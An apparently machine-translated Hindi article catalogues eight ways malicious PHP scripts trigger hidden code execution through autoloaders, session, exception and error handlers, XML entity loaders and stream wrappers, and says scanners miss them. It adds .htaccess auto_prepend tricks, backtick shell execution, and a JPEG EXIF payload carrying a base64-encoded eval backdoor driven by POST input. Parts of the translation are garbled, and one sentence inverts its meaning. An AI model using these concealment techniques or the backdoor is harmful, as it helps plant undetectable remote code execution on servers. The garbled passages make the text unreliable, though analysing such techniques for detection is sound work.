👩‍👩‍👦‍👦 👩🏾‍🚒 🧕🏾 दुर्भावनापूर्ण स्क्रिप्ट में प्रयुक्त निहित php कोड आह्वान के लिए उन्नत तरीके ☕️ 👩‍💼 🧜🏼

दुर्भावनापूर्ण स्क्रिप्ट में निहित php कोड कॉल के बारे में नोट की तार्किक निरंतरता इसका दूसरा हिस्सा होगी, जिसमें मैं विभिन्न php हैंडलर और लोडर का उपयोग करने के लिए अधिक जटिल और कम स्पष्ट विकल्पों पर विचार करूंगा, और लेख के अंत में मैं कुछ उदाहरण दूंगा कि हैकर्स कैसे दुर्भावनापूर्ण कोड और php का उपयोग करते हैं। साइट पर स्क्रिप्ट।

हम फिर से कॉल का उपयोग दुर्भावनापूर्ण कोड के उदाहरण के रूप में करेंगे।

echo 'Test'

चूंकि लेख का उद्देश्य छिपी हुई कोड निष्पादन के लिए विभिन्न दृष्टिकोणों और तंत्रों को दिखाना है, इसलिए सादगी के लिए, हमारे "दुर्भावनापूर्ण कोड" को निष्पादित करने वाले फ़ंक्शन को कोड के बगल में घोषित किया जाएगा जो कि अंतर्निहित रूप से लागू किया गया है। वास्तविक जीवन में, दुर्भावनापूर्ण कोड और इसकी कॉल एक-दूसरे से दूर होती हैं, कम से कम अलग-अलग php स्क्रिप्ट में, लेकिन अधिक बार कोड को डेटाबेस, छवि मेटा-डेटा, किसी अन्य सर्वर से लोड किया जाता है, जिसके बाद इसे फ़ंक्शन eval, assert, preg_replace और जैसे द्वारा निष्पादित किया जाता है ।

विकल्प # 1: ऑटोलॉड तंत्र का उपयोग करना।

दुर्भावनापूर्ण कोड को ऑटोलैड हैंडलर में कहा जाता है जब कोई भी अयोग्य वर्ग नहीं बनाता है।

 <?php function __autoload($classname) { echo 'Test'; } //... new myEvilClass();

विकल्प # 2: 5.3 और उच्चतर संस्करण में एक और ऑटोलॉड तंत्र का उपयोग करना

 <?php // php >= 5.3.0 class EvilClass { static public function evil($name) { echo 'Test'; } } // ... spl_autoload_register(__NAMESPACE__ .'\EvilClass::evil'); // ... new Malware;

विकल्प # 3: एक सत्र हैंडलर का उपयोग करें।

जिस समय सत्र बनाया जाता है, उस समय पंजीकृत समारोह को बुलाया जाएगा।

 <?php function just_do_it() { echo 'Test'; } // ... $f = function() {}; session_set_save_handler("just_do_it", $f, $f, $f, $f, $f); @session_start();

विकल्प # 4: एक पुनरावृत्ति का उपयोग करना।

एक बदलाव के लिए, हम स्पष्ट रूप से एक फ़ंक्शन की घोषणा नहीं करेंगे। नीचे दिए गए विकल्प में, फ़ंक्शन कोड को किसी भी स्टोर से लिया जा सकता है
एक स्ट्रिंग बनाएं और रनटाइम में एक फ़ंक्शन बनाएं।

 <?php $f = create_function('', "echo 'Test';"); // ... $it = new ArrayIterator(array('')); iterator_apply($it, $f, array($it));

विकल्प नंबर 5: एक अपवाद हैंडलर के माध्यम से कॉल।

इस अवतार में, कॉल के लिए कोड अपवाद पाठ के रूप में पारित किया जा सकता है।

 <?php function exception_handler($e) { preg_replace_callback('||', create_function('', $e->getMessage()), ''); } // ... set_exception_handler('exception_handler'); // ... throw new Exception('echo "Test";');

विकल्प # 6: एक त्रुटि हैंडलर का उपयोग करें।

दृष्टिकोण # 5 के समान है, लेकिन कोड को ट्रिगर_रोर () या user_error () विधियों द्वारा स्पष्ट रूप से कहा जाता है। कोड स्वयं त्रुटि पाठ के माध्यम से पारित किया जाता है। यह ध्यान देने योग्य है कि यह समाधान किसी भी error_reporting सेटिंग्स के साथ काम करता है।

 <?php function error_handler($errno, $errstr, $errfile, $errline) { array_map(create_function('', $errstr), array('')); } // ... set_error_handler('error_handler'); $badcode = 'echo "Test";'; trigger_error($badcode, E_USER_ERROR); //  user_error();

विकल्प संख्या 7: अपनी इकाई लोडर का उपयोग करें।

संस्करण 5.4 के बाद से काम करता है। दुर्भावनापूर्ण कोड XML टैग्स या दस्तावेज़ सेवा क्षेत्रों में हो सकते हैं।

 <?php //  php >= 5.4 $xml =<<<XML <!DOCTYPE zlodei PUBLIC "echo 'Test';" "http://example/"> <zlodei>bar</zlodei> XML; $dtd =<<<DTD <!ELEMENT zlodei (#PCDATA)> DTD; libxml_set_external_entity_loader( function ($public, $system, $context) use($dtd) { array_reduce(array(''), create_function('', $public)); } ); // ... $dd = new DOMDocument; $r = $dd->loadXML($xml); @$dd->validate();

विकल्प संख्या 8: निहित कोड कॉल के लिए अपनी स्वयं की स्ट्रीम बनाएं

एक स्ट्रीम हैंडलर पंजीकृत है, और कोई भी फ़ंक्शन जो स्ट्रीम के साथ काम कर रहा है, कोड को निष्पादित कर सकता है जिसे url में पारित किया जा सकता है या स्ट्रीम में लिखा जा सकता है। एक परिवर्तन के लिए, बेनेल एवल () के बजाय, कोड create_function () के माध्यम से कहा जाता है।

 <?php class MalwareStream { function stream_open($path, $mode, $options, &$opened_path) { $url = parse_url($path); $f = create_function('', $url["host"]); $f(); return true; } } // ... stream_wrapper_register("malw", "MalwareStream"); // ... $fp = fopen('malw://echo "Test";', '');

पिछले नोट में सूचीबद्ध निर्माणों के विपरीत, स्थैतिक विश्लेषण में इस तरह के निहित कोड कॉल का पता लगाना काफी समस्याग्रस्त है। सर्वर एंटीवायरस स्कैनर के लिए, यह अभी तक संभव नहीं है।

बोनस ट्रैक

दुर्भावनापूर्ण कोड को डाउनलोड करने और निष्पादित करने के लिए हैकर्स किस अन्य विकल्प का उपयोग करते हैं?

सबसे पहले, .htaccess फ़ाइल या php.ini में php_auto_append / php_auto_prepend निर्देशों का उपयोग करते हुए। उदाहरण के लिए

 php_value auto_prepend_file /images/stories/mycode.jpg

किसी भी स्क्रिप्ट को निष्पादित करने से पहले mycode.jpg फ़ाइल से कोड निष्पादित करेगा।

दूसरे, dl () फ़ंक्शन द्वारा डायनामिक एक्सटेंशन लोडिंग। ऐसा करने के लिए, .so (* nix) या .dll (विंडोज़) मॉड्यूल बनाना होगा। हालांकि, यह एक काफी दुर्लभ मामला है, और इसमें एक जगह है। उन्नत हैकर्स Apache या nginx में मॉड्यूल विकसित और इंजेक्ट कर सकते हैं।

तीसरा, बैक कोट्स के साथ एक कंस्ट्रक्शन है (जो शेल_सेक्स के लिए एक उपनाम है):

 <?php $a = `ls -la`; echo $a;

वह ls -la सिस्टम कमांड को भी निष्पादित करेगा, जब तक कि, निश्चित रूप से, ph_ सेटिंग्स में शेल_एक्सएक्यू सक्षम नहीं है।

और अंत में, एक अंतर्निहित कोड कॉल का एक उदाहरण जो एक jpeg फ़ाइल के exif हेडर से लोड किया गया है।

 <?php $exif = exif_read_data('/home/website/images/stories/food/evil.jpg'); preg_replace($exif['Make'],$exif['Model'],'');

एक jpg फ़ाइल कुछ इस तरह दिखती है:

yOya^@^PJFIF^@^A^B^@^@d^@d^@^@ya^@?Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@yi^@^QDucky^@^A^@^D^@^@^@<^@^@yi^@^NAdobe^...

मेक फ़ील्ड से, /.*/e लिया जाता है, मॉडल फ़ील्ड @ @ eval (base64_decode (...)) से लिया जाता है और इसे “e” के कारण preg_replace () के माध्यम से निष्पादित किया जाता है।

आपका ध्यान देने के लिए धन्यवाद।

दुर्भावनापूर्ण स्क्रिप्ट में प्रयुक्त निहित php कोड आह्वान के लिए उन्नत तरीके

बोनस ट्रैक

More articles: